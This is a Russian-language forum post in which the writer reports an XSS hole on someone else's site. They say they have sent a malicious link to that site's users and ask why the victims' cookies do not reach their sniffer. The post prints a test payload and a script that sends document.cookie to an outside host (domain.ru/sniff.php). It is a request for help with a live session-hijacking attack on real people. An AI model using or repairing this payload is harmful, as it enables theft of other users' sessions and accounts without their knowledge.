Здравствуйте уважаемые форумчане нужна ваша помощь ) Была обнаружена XSS уязвимость на одном из сайтов при вводе
сайт показывает мне мои куки и с этого я сделал вывод что сайт уязвим. На одном форуме дали код сниффера он отлично работает проверил на одном из своих сайтов.Но дело в том что когда я даю пользователю данного сайта уязвимою ссылку типа
и он по ней проходит куки не отправляются что можно сделать ?
Код:
<script>alert(document.cookie)</script>
Код:
<script>img = new Image();img.src="http://domain.ru/sniff.php?cookie="+document.cookie;</script>